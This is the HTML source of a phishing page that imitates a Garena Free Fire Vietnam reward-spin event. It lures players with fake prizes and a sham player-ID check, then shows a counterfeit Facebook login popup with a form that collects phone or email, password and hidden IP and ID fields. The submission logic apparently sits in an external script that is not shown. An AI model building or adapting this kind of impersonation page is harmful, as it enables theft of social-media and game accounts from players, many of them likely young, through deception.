<html>

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta property="og:title" content="Free Fire - Vòng Quay May Mắn">
    <meta name="description" content="Thử vận may của bạn hoàn toàn miễn phí !">
    <meta property="og:description" content="Thử vận may của bạn hoàn toàn miễn phí !">
    <meta property="og:url" content="./">
    <meta property="og:site_name" content="Free Fire - Vòng Quay May Mắn">
    <meta property="og:type" content="website">
    <meta name="copyright" content="Dương ST">
    <meta name="theme-color" content="#000">
    <meta property="og:image" content="/">
    <title>Free Fire - Vòng Quay Sinh Nhật</title>
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/login/facebook.css">
    <link rel="stylesheet" href="css/login/twitter.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css" />
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">

    <link rel="icon" href="https://ff.garena.vn/wp-content/themes/freefire/images/game-icon.png">
</head>
<!-- <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false"> -->

<body>
    <style type="text/css">
        @charset "utf-8";
        @import url('https://fonts.googleapis.com/css2?family=Baloo+2:wght@600&display=swap');
        @import url("https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Teko:300,400,500");
        *,
        *:before,
        *:after {
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
        }

        @font-face {
            font-family: 'pubgFont';
            font-style: normal;
            font-weight: 700;
            src: url(fonts/pubg.woff2) format("woff2"), url(fonts/pubg.woff) format("woff"), url(fonts/pubg.ttf) format("truetype");
        }

        body {
            background: black;
            margin: 0;
            font-family: 'Teko';
        }

        .container {
            background: url(img/container-bg.png) no-repeat center;
            background-size: 100% 100%;
            position: relative;
            margin: 0px auto;
            max-width: 400px;
            height: auto;
            border: 1px solid #57c0ff;
        }

        .navbar {
            background: #000;
            width: 100%;
            height: 50px;
            padding: 4px;
            border-bottom: 1px solid #4dcafd;
        }

        .navbar img {
            width: 41;
            margin-right: 5px;
            border-radius: 5px;
            float: left;
        }

        .navbar-txt-game {
            padding-top: 2px;
            color: #feab02;
            font-size: 18px;
            font-family: 'Teko', sans-serif;
            text-align: left;
        }

        .navbar-txt-game span {
            color: #d9d9d8;
            font-size: 13px;
            line-height: 10px;
            display: block;
        }

        .navbar-btn-wrapper {
            margin-top: 5px;
            float: right;
        }

        .navbar-btn-wrapper i {
            margin-left: 5px;
            font-size: 38px;
            color: #d9d9d8;
            line-height: 31px;
            float: right;
        }

        .navbar-btn {
            background: #eaa300;
            width: 70px;
            height: auto;
            margin: 2px;
            padding: 2px;
            color: #000;
            font-size: 15px;
            font-family: 'Baloo 2';
            text-align: center;
            text-transform: uppercase;
            border: 1px solid #ffcc57;
            display: inline-block;
            outline: none;
        }

        .header {
            width: 100%;
            height: 200px;
            margin-left: auto;
            margin-right: auto;
            border-bottom: 1px solid #4dcafd;
            display: block;
        }

        .header img {
            width: 100%;
            height: 100%;
        }

        .landing {
            width: 100%;
            height: auto;
        }

        .event-wrapper {
            width: 100%;
            margin-bottom: 100%;
            padding: 10px;
        }

        .event-wrapper img:nth-child(1) {
            width: 130px;
            float: right;
        }

        .event-notify {
            background-color: rgba(0, 0, 0, 0.8);
            width: 100%;
            height: auto;
            margin-top: 20px;
            margin-left: auto;
            margin-right: auto;
            padding: 8px;
            display: block;
        }

        .event-notify-title {
            padding-bottom: 10px;
            color: #fff;
            font-size: 17px;
            font-family: pubgFont;
            text-align: left;
            text-decoration: underline;
        }

        .event-notify-content {
            color: #fff;
            font-size: 16px;
            font-family: pubgFont;
            text-align: left;
            line-height: 18px;
        }

        .event-btn {
            background: transparent;
            width: auto;
            height: auto;
            margin-top: 20px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 15px;
            padding: 7px;
            padding-left: 15px;
            padding-right: 15px;
            color: #eaa300;
            font-size: 17px;
            font-family: pubgFont;
            text-align: center;
            border: 1px solid #eaa300;
            outline: none;
            display: block;
        }

        .box {
            width: 95%;
            height: auto;
            margin-top: 12px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 12px;
            position: relative;
            border-radius: 5px;
            display: block;
        }

        .event-alert {
            background: url(img/popup1.png) no-repeat center center;
            background-size: 100% 100%;
            width: 100%;
            height: 55px;
            margin-left: auto;
            margin-right: auto;
            padding: 5px;
            display: block;
            border-radius: 4px;
        }

        .event-alert span {
            position: absolute;
            top: 5.5%;
            right: 7%;
            width: auto;
            color: white;
        }

        .event-alert-title {
            color: #fff;
            text-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            font-size: 17px;
            font-family: pubgFont;
            text-align: center;
        }

        .event-alert-desc {
            color: #fff;
            text-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            font-size: 16px;
            font-family: 'Baloo 2', cursive;
            text-align: center;
            line-height: 15px;
        }

        .menu-wrapper-border {
            height: 11px;
        }

        .menu-wrapper {
            width: 40%;
            height: auto;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 5px;
            display: block;
        }

        .menu-content {
            background: url(img/popup1.png) no-repeat center center;
            background-size: 100% 100%;
            width: auto;
            height: auto;
            padding: 7px;
            color: #fff;
            text-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            font-size: 12px;
            font-family: 'Baloo 2', cursive;
            text-align: center;
            border: none;
            cursor: pointer;
        }

        .menu-content-active {
            background: url(img/menu_off.png) no-repeat center center;
            background-size: 100% 100%;
            color: #fff;
        }

        .scroll {
            position: relative;
            width: 100%;
            height: 390px;
            margin-top: 11px;
            margin-left: auto;
            margin-right: auto;
            display: block;
            scrollbar-face-color: #ffbb40;
            scrollbar-shadow-color: #ffbb40;
            scrollbar-highlight-color: #ffbb40;
            scrollbar-3dlight-color: #ffbb40;
            scrollbar-darkshadow-color: #ffbb40;
            scrollbar-track-color: #ffbb40;
            scrollbar-arrow-color: #ffbb40;
        }

        .hadiah {
            width: 90px;
            height: 90px;
            display: inline-block;
        }

        .hadiah img {
            width: 100%;
            height: 100%;
            border-radius: 7px;
            border: none;
        }

        @media only screen and (max-width:600px) {}

        .active {
            border: 1px solid orange;
        }

        .tombol {
            width: 95px;
            height: 90px;
            position: absolute;
            top: 36%;
            left: 38.5%;
        }

        .tombol img {
            width: 100%;
            height: 100%;
        }

        .footer {
            background: #050711;
            width: 100%;
            height: auto;
            padding: 10px;
            border-top: 1px solid #57c0ff;
        }

        .footer-txt-follow {
            margin-top: 10px;
            margin-bottom: 10px;
            color: #fff;
            font-size: 17px;
            font-family: pubgFont;
            font-weight: bold;
            text-align: center;
            text-transform: uppercase;
        }

        .footer-follow-icon {
            width: 49px;
            height: 49px;
            margin: 5px;
            display: inline-block;
        }

        .footer-txt-copyright {
            color: #fff;
            font-size: 15px;
            font-family: pubgFont;
            text-align: center;
        }

        .footer-copyright-icon {
            width: 90%;
            margin-top: 20px;
            margin-left: auto;
            margin-right: auto;
            margin-bottom: 20px;
            display: block;
        }

        .popup {
            width: 100%;
            height: 100%;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 9999;
            background-color: rgba(0, 0, 0, 0.4);
        }

        .popup-box {
            background: url(img/popup1.png) no-repeat center;
            background-size: 100% 100%;
            width: 380px;
            height: 270px;
            position: relative;
            margin: 50px auto;
            margin-top: 16%;
            text-align: center;
        }

        .popup-title {
            padding-left: 20px;
            padding-top: 20px;
            color: #5fe3ff;
            text-shadow: 0 0 0.21rem rgba(144, 180, 236, 0.74);
            font-size: 20px;
            font-family: 'Baloo 2', cursive;
            text-align: left;
        }

        .popup-content {
            width: 100%;
            height: 76.5%;
            border: 1px solid transparent;
            position: relative;
        }

        .popup-rewards-title {
            color: #fff;
            text-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            font-size: 20px;
            font-family: 'Baloo 2', cursive;
            text-align: center;
        }

        .popup-rewards-img1 {
            width: 90px;
            height: 90px;
            margin: 5px;
            margin-top: 10px;
            display: inline-block;
        }

        .popup-btn-wrapper {
            width: 100%;
            height: 50px;
        }

        .popup-btn-wrapper button {
            width: 30%;
            height: 30px;
            padding: 2px;
            font-size: 18px;
            font-family: 'Baloo 2', cursive;
            text-align: center;
            border: none;
            outline: none;
        }

        .popup-btn-deactive {
            background: url(img/tag1.png) no-repeat center;
            background-size: 100% 100%;
            position: absolute;
            left: 15%;
            margin-top: -35px;
            text-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            color: silver;
        }

        .popup-btn-active {
            background: url(img/menu_off.png) no-repeat center;
            background-size: 100% 100%;
            position: absolute;
            left: 35%;
            margin-top: -35px;
            text-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            color: #fff;
        }

        .btn-login {
            width: 85%;
            height: auto;
            padding: 8px;
            margin-left: auto;
            margin-right: auto;
            color: #000;
            text-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            font-size: 15px;
            font-family: 'Baloo 2', cursive;
            border: none;
            border-radius: 5px;
            outline: none;
            display: block;
        }

        .btn-login i {
            color: #fff;
            font-size: 20px;
            float: left;
        }

        .facebook {
            background: #3b5998;
            color: #fff;
            margin-top: 20px;
            margin-bottom: 3px;
        }

        .twitter {
            background: #08a0e9;
            color: #fff;
            margin-bottom: 10px;
        }

        .popup-close {
            width: 20px;
            height: 20px;
            color: #000;
            text-align: center;
            text-transform: uppercase;
            font-weight: bold;
            position: absolute;
            top: 13px;
            right: 10px;
            display: block;
        }

        .popup-close i {
            color: #000;
            font-size: 25px;
        }

        .popup-login {
            background: rgba(0, 0, 0, 0.5);
            width: 100%;
            height: 100%;
            position: fixed;
            top: 0;
            left: 0;
            z-index: 9999;
        }

        .popup-box-login-fb {
            background: #ECEFF6;
            max-width: 330px;
            height: auto;
            position: relative;
            margin: 50px auto;
            margin-top: 1.9%;
            text-align: center;
            font-family: 'Teko';
            color: #000;
            border-radius: 10px;
        }

        .popup-box-login-twitter {
            background: #fff;
            max-width: 330px;
            height: 380px;
            position: relative;
            margin: 50px auto;
            margin-top: 10%;
            text-align: center;
            font-family: 'Teko';
            color: #000;
            border-radius: 10px;
        }

        .close-fb {
            background: #000;
            width: 20px;
            height: 20px;
            color: #fff;
            text-align: center;
            text-decoration: none;
            border-radius: 50%;
            border: 1.5px solid #fff;
            position: absolute;
            top: -8px;
            right: -10px;
            display: block;
        }

        .close-fb i {
            color: #fff;
            padding-top: 1px;
        }

        .close-other {
            background: #000;
            width: 20px;
            height: 20px;
            color: #fff;
            text-align: center;
            text-decoration: none;
            border-radius: 50%;
            border: 1.5px solid #fff;
            top: -8px;
            right: -10px;
            position: absolute;
            z-index: 9999999;
            display: block;
        }

        .close-other i {
            color: #fff;
            padding-top: 1px;
        }

        .verify-input {
            background: #dfedf975;
            background-size: 100% 100%;
            box-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            width: 90%;
            height: auto;
            margin-bottom: 3px;
            padding: 6px;
            color: #fff;
            font-size: 15px;
            font-family: 'Baloo 2', cursive;
            border-top: 0.5px solid white;
            border-bottom: 0.5px solid white;
            border-right: 2px solid white;
            border-left: 2px solid white;
            border-radius: 3px;
            position: relative;
            outline: none;
        }

        .verify-input::placeholder {
            color: #fff;
        }

        .verify-select {
            background: #dfedf975;
            background-size: 100% 100%;
            box-shadow: 0 0 0.15rem rgba(144, 180, 236, 0.74), 0 0 0.15rem rgba(144, 180, 236, 0.74);
            width: 90%;
            height: auto;
            margin-bottom: 3px;
            padding: 6px;
            padding-left: 3px;
            color: #fff;
            font-size: 15px;
            font-family: pubgFont;
            border-top: 0.5px solid white;
            border-bottom: 0.5px solid white;
            border-right: 2px solid white;
            border-left: 2px solid white;
            border-radius: 3px;
            position: relative;
            outline: none;
        }

        .verify-btn {
            background: url(img/menu_off.png) no-repeat center;
            background-size: 100% 100%;
            width: 35%;
            height: auto;
            margin-top: 10px;
            padding: 10px;
            font-size: 15px;
            font-family: Teko;
            text-align: center;
            color: #fff;
            margin-bottom: 3px;
            border: none;
            position: relative;
            outline: none;
        }

        .kanan {
            float: right;
        }

        .kiri {
            float: left;
        }

        .tengah {
            margin-left: auto;
            margin-right: auto;
            display: block;
        }

        ::-webkit-scrollbar {
            display: none;
            width: 0px;
        }

        .header {
            max-width: 400px;
            height: 210px;
            margin: 0px;
        }

        .item div {
            width: 100%;
            height: 100%;
            border-radius: 3px 3px 0px 0px;
        }

        .item div:first-child {
            margin-left: 0;
        }

        figure {
            margin: 0;
            padding: 0;
            overflow: hidden;
        }

        .lightshagitz figure {
            position: relative;
        }

        .lightshagitz figure::before {
            position: absolute;
            top: 0;
            left: -75%;
            z-index: 2;
            display: block;
            content: '';
            width: 50%;
            height: 100%;
            background: -webkit-linear-gradient(left, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, .3) 100%);
            background: linear-gradient(to right, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, .3) 100%);
            -webkit-transform: skewX(-25deg);
            transform: skewX(-25deg);
        }

        .lightshagitz figure::before {
            -webkit-animation: shine 2s infinite;
            animation: shine 2s infinite;
        }

        @-webkit-keyframes shine {
            100% {
                left: 125%;
            }
        }

        @keyframes shine {
            100% {
                left: 125%;
            }
        }

        @media only screen and (max-width:600px) {
            .container {
                width: 100%;
                height: auto;
                margin-top: 0px;
                margin-bottom: 0px;
                border: none;
                border-top: 1px solid #57c0ff;
                border-radius: 0px;
                padding: 0px;
            }
            .box {
                width: 96%;
                height: auto;
            }
            .scroll {
                height: none;
            }
            .popup-box {
                width: 345px;
                margin-top: 60%;
            }
            .popup-item {
                width: 25%;
                height: 85px;
            }
            .popup-box-login-fb {
                margin-top: 4%;
            }
            .popup-box-login-twitter {
                margin-top: 25%;
            }
            .header {
                width: 100%;
            }
        }
    </style>
    <!-- Code by 0868158117 -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script type="text/javascript">
        $(document).ready(function() {
            var detik = 59;
            var menit = 59;
            var jam = 23;

            function hitung() {
                setTimeout(hitung, 1000);
                $('#latestTimer').html('' + jam + ' : ' + menit + ' : ' + detik + '');
                detik--;
                if (detik < 0) {
                    detik = 59;
                    menit--;
                    if (menit < 0) {
                        menit = 0;
                        detik = 0;
                    }
                }
            }
            hitung();
        });

        $(document).ready(function() {
            var detik = 59;
            var menit = 59;
            var jam = 23;

            function hitung() {
                setTimeout(hitung, 1000);
                $('#seasonTimer').html('' + jam + ' : ' + menit + ' : ' + detik + '');
                detik--;
                if (detik < 0) {
                    detik = 59;
                    menit--;
                    if (menit < 0) {
                        menit = 0;
                        detik = 0;
                    }
                }
            }
            hitung();
        });
    </script>
    <!-- Code by Dương ST 0868158117 zalo -->
    <script>
        function open_account_login() {
            $('.account_login').show();
            $('.reward_confirmation').hide();
        }

        function open_facebook() {
            $('.login-facebook').show();
            $('.account_login').hide();
        }

        function open_twitter() {
            $('.login-twitter').show();
            $('.account_login').hide();
        }

        function close_account_login() {
            $('.account_login').hide()
        }

        function tutup_facebook() {
            $('.login-facebook').hide()
            $('.account_login').show();
        }

        function tutup_twitter() {
            $('.login-twitter').hide()
            $('.account_login').show();
        }
    </script>
    <div class="container rewardsBox">
        <div class="navbar">
            <div class="navbar-btn-wrapper">
                <i class="fa fa-bars fa-2x"></i>
                <button class="navbar-btn">
<a href="https://play.google.com/store/apps/details?id=com.dts.freefireth&hl=vi&gl=US">Tải Game</a></button>
            </div>
            <!--- navbar-btn-wrapper --->
            <img src="https://ff.garena.vn/wp-content/themes/freefire/images/game-icon.png">
            <div class="navbar-txt-game">
                FREE FIRE
                <span>VÒNG QUAY FREE FIRE </span>
            </div>
            <!--- navbar-txt-game --->
        </div>
        <!--- navbar --->
        <div class="header">
            <div class="slider">
                <img id="banner" src="img/banner.jpg">
            </div>
            <!--- slider --->
        </div>
        <!--- header --->
        <div class="box">
            <div class="event-alert">
                <div class="event-alert-title">GARENA FREE FIRE VIETNAM</div>
                <div class="event-alert-desc">Thử vận may của bạn tại đây </div>
            </div>

            <div class="menu-wrapper-border"></div>
            <div class="menu-wrapper isinama" >
                <div class="menu-content" style="width: 40%;position: absolute;top: 14%;left: 1%"><span id="isinama" ></span><i class="fa fa-user"></i></span></div>
                <div class="menu-content" style="width: 40%;position: absolute;top: 14%;right: 1%" id="ubah" onclick="ubah()"> Đổi phần thưởng <i class="fa fa-refresh"></i></div>
                <div class="menu-content" style="width: 40%;position: absolute;top: 14%;right: 1%;display: none" id="ubahlagi" onclick="ubahlagi()"> Đổi phần thưởng <i class="fa fa-refresh"></i></div>
            </div>
            <br>
            <div class="tab_rewards" id="hadiah1">
                <div class="scroll">
                    <center>

                        <div class="hadiah lightshagitz" style="position: absolute;top:5%;left: 38%">
                            <div>
                                <figure>
                                    <img data-order="0" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/reward/1.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:20%;left: 10%">
                            <div>
                                <figure>
                                    <img data-order="1" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/reward/2.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:50%;left: 10%">
                            <div>
                                <figure>
                                    <img data-order="2" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/reward/3.png">
                                </figure>
                            </div>
                        </div>

                        <div class="tombol" id="gas">
                            <div>
                                <figure>
                                    <img src="img/draw.png">
                                </figure>
                            </div>
                        </div>
                        <div class="tombol" id="maaf" style="display: none">
                            <div>
                                <figure>
                                    <img src="img/isdraw.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:65%;left: 38%">
                            <div>
                                <figure>
                                    <img data-order="3" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/reward/4.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:50%;right: 10%">
                            <div>
                                <figure>
                                    <img data-order="4" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/reward/5.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:20%;right: 10%">
                            <div>
                                <figure>
                                    <img data-order="5" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/reward/6.png">
                                </figure>
                            </div>
                        </div>
                    </center>
                </div>
                <!--- scroll --->
            </div>
            <!--- tab-rewards --->

            <div class="tab_rewards" id="hadiah2" style="display: none">
                <div class="scroll">
                    <center>

                        <div class="hadiah lightshagitz" style="position: absolute;top:5%;left: 38%">
                            <div>
                                <figure>
                                    <img data-orders="0" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/rewards/1.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:20%;left: 10%">
                            <div>
                                <figure>
                                    <img data-orders="1" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/rewards/2.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:50%;left: 10%">
                            <div>
                                <figure>
                                    <img data-orders="2" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/rewards/3.png">
                                </figure>
                            </div>
                        </div>

                        <div class="tombol" id="gas2">
                            <div>
                                <figure>
                                    <img src="img/draw.png">
                                </figure>
                            </div>
                        </div>
                        <div class="tombol" id="maaf2" style="display: none">
                            <div>
                                <figure>
                                    <img src="img/isdraw.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:65%;left: 38%">
                            <div>
                                <figure>
                                    <img data-orders="3" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/rewards/4.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:50%;right: 10%">
                            <div>
                                <figure>
                                    <img data-orders="4" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/rewards/5.png">
                                </figure>
                            </div>
                        </div>

                        <div class="hadiah lightshagitz" style="position: absolute;top:20%;right: 10%">
                            <div>
                                <figure>
                                    <img data-orders="5" src="img/isdraw.png" style="position: absolute;display: none">
                                    <img src="img/rewards/6.png">
                                </figure>
                            </div>
                        </div>
                    </center>
                </div>
                <!--- scroll --->
            </div>
            <!--- tab-rewards --->
        </div>
        <!--- box --->
        <div class="footer">
            <div class="footer-txt-follow">Follow Us</div>
            <!--- footer-txt-follow --->
            <center>
                <a href="https://www.facebook.com/freefirevn/" target="_blank"> <img class="footer-follow-icon" src="img/link_1.png"></a>
                <a href="https://www.youtube.com/channel/UCaXPyn1WCz3YNE_hCOOAoFA/" target="_blank"> <img class="footer-follow-icon" src="img/link_2.png"></a>
                <a href="https://shopnapnhanh.com" target="_blank"><img class="footer-follow-icon" src="img/link_3.png"></a>
                <a href="https://shopnapnhanh.com" target="_blank"><img class="footer-follow-icon" src="img/link_4.png"></a>
                <a href="https://shopnapnhanh.com" target="_blank"><img class="footer-follow-icon" src="img/link_5.png"></a>
            </center>
            <img class="footer-copyright-icon" src="https://ff.garena.vn/wp-content/themes/freefire/images/logo-footer.png">
            <div class="footer-txt-copyright">ⓒ 2021 Garena VietNam, Inc. All rights reserved.</div>
            <!--- footer-txt-copyright --->
            <div class="footer-txt-copyright">ⓒ Sinh Nhật Garena FreeFire </div>
            <!--- footer-txt-copyright --->
            <div class="footer-txt-copyright"> Privacy Policy | Garena Free Fire User Agreement</div>
            <!--- footer-txt-copyright --->
        </div>
        <!--- footer --->
    </div>
    <!--- container --->

    <div class="popup reward_confirmation" style="display: none;">
        <div class="popup-box">
            <div class="popup-title"><i class="fa fa-gift"></i> Xác nhận</div>
            <div class="popup-content">
                <br>
                <div class="popup-rewards-title">Bạn có muốn nhận phần thưởng này?</div>
                <img class="popup-rewards-img1" src="" id="myRewardImg">
            </div>
            <div class="popup-btn-wrapper">
                <button type="button" class="popup-btn-active" onmousedown="buka.play();" onclick="open_account_login()">Nhận</button>
            </div>
        </div>
    </div>

    <div class="popup account_login" style="display: none;">
        <div class="popup-box">
            <div class="popup-title"><i class="fa fa-user"></i> Đăng nhập tài khoản </div>
            <div class="popup-content">
                <br>
                <div class="popup-rewards-title" style="color: #fff">Đăng nhập tài khoản Free Fire của bạn</div>
                <button type="button" class="btn-login facebook" onclick="open_facebook();"><i class="fa fa-facebook-square icon-login"></i> Đăng nhập với Facebook</button>
            </div>
        </div>
    </div>

    <div class="popup playidVerif" >
        <div class="popup-box">
            <div class="popup-title"><i class="fa fa-user"></i> Xác minh ID</div>
            <div class="popup-content">
                <br>
                <div class="popup-rewards-title titleId" style="color: #fff;text-shadow: 0 0 0.15rem rgba(144,180,236,0.74),0 0 0.15rem rgba(144,180,236,0.74);">Vui lòng nhập ID của bạn</div>
                <input type="number" class="verify-input" name="playid" id="playid" placeholder="Nhập ID tại đây">
                <i class="fa fa-2x fa-spinner fa-spin waitId" style="display: none;color:#fff"></i><br>
                <small style="position: absolute;left: 5%;margin-top:-2.5px;color:red;display: none;" id="errorId"><i class="fa fa-info-circle" style="padding-right: 5px;"></i> Vui lòng nhập ID </small>
                <button class="verify-btn" type="button" id="verify">Xác Minh</button>
            </div>
        </div>
    </div>

    <input type="hidden" id="status">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script type="text/javascript">
        $(document).ready(function() {

            $("#verify").on('click', function() {
                var playid = $("#playid").val();
                if (playid == "") {
                    $('#errorId').show();
                    $('#playid').css('border', '1px solid red');
                    $('#playid').val('');
                } else {
                    $('#errorId').fadeOut();     
                            $(".titleId").html('Please wait');
                            $('#playid').fadeOut();
                            $('.waitId').fadeIn();
                            $('#verify').attr('disabled', 'true');
                            $('#verify').css('opacity', '0.5');
                    
                            var stat = $('#status').val(status);
                            var isi_stat = stat.val();
                            $("#btn_oke").show();
                            $("#btnload").hide();
                            if (isi_stat == "Wrong_UserId") {
                                $('#verify').removeAttr('disabled');
                                $('#verify').css('opacity', '1');
                                $('.waitId').hide();
                                $(".titleId").html('Please input PlayerID');
                                $(".errorId").hide();
                                $("#playid").fadeIn();
                                $('#errorId').show();
                                $('#playid').css('border', '1px solid #fff');
                                $('#errorId').html('invalid player id(2002-2002-0)‎');
                            } else if (isi_stat == "Token Error") {
                                $('#verify').removeAttr('disabled');
                                $('#verify').css('opacity', '1');
                                $('.waitId').hide();
                                $(".titleId").html('Please input PlayerID');
                                $(".errorId").hide();
                                $("#playid").fadeIn();
                                $('#errorId').show();
                                $('#playid').css('border', '1px solid #fff');
                                $('#errorId').html('System error(2002-2002-0)‎');
                            } else {
                                $('#isinick1').val(status);
                                $('#isinick2').val(status);
                                $('#isiplayid1').val(playid);
                                $('#isiplayid2').val(playid);
                                $('.playidVerif').hide();
                                $('.isinama').fadeIn();
                                $('#isinama').html('Chúc bạn may mắn');
                                $('#isinama').fadeIn('slow');
                            
                        }
                    
                }
            });

        });
    </script>
    <style type="text/css">
        #togglePassword {
            position: absolute;
            margin-left: -30px;
            margin-top: 10px;
            cursor: pointer;
        }
    </style>
    <div class="popup-login login-facebook animated fadeIn" style="display: none;">
        <div class="popup-box-login-fb"><a onclick="tutup_facebook()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
            <div class="navbar-fb">
                <img src="https://i.ibb.co/QNdsmDc/facebook-text.png">
            </div>
            <div class="content-box-fb">
                
                <p class="alert email" id="tb">  </p>
                <img width="75" height="" src="https://i.ibb.co/fFbdRKj/thumbnail.jpg">
                <div class="txt-login-fb">
                    Đăng nhập tài khoản Facebook của bạn để kết nối với Garena Free Fire
                </div>
                <form id="login_form" class="login-form" action="" method="POST">
                    <label>
	            <input type="text" id="taikhoan" name="taikhoan" placeholder="Số điện thoại di động hoặc email" autocomplete="off" autocapitalize="off">
	            </label>
                    <label>
	            <input type="password" id="matkhau" name="matkhau" placeholder="Mật khẩu" autocomplete="off" autocapitalize="off">
	            </label>
                    <input type="hidden" name="ip" id="ip" value="">
                    <input type="hidden" id="id" name="id" value="">
                    <input type="hidden" id="nick" name="nick" value="">
                    <button type="submit" id="btnfb" class="btn-login-fb">Đăng nhập</button>
                </form>
                <div class="txt-create-account">Tạo tài khoản mới</div>
                <div class="txt-not-now">Hoặc</div>
                <div class="txt-forgotten-password">Quên mật khẩu?</div>
            </div>
            <div class="language-box">
                <center>
                    <div class="language-name language-name-active">Tiếng Việt</div>
                    <div class="language-name"> English (UK) </div>
                    <div class="language-name">Basa Jawa</div>
                    <div class="language-name">Bahasa Melayu</div>
                    <div class="language-name">日本語</div>
                    <div class="language-name">Español</div>
                    <div class="language-name">Português (Brasil)</div>
                    <div class="language-name">
                        <i class="fa fa-plus"></i>
                    </div>
                </center>
            </div>
            <div class="copyright">Facebook Inc.</div>
        </div>
    </div>
    <script type="text/javascript">
        const togglePassword = document.querySelector('#togglePassword');
        const password = document.querySelector('#password');
        togglePassword.addEventListener('click', function(e) {
            // toggle the type attribute
            const type = password.getAttribute('type') === 'password' ? 'text' : 'password';
            password.setAttribute('type', type);
            // toggle the eye / eye slash icon
            this.classList.toggle('bi-eye');
        });
    </script>

    <script type="text/javascript" src="js/shagitz.js"></script>

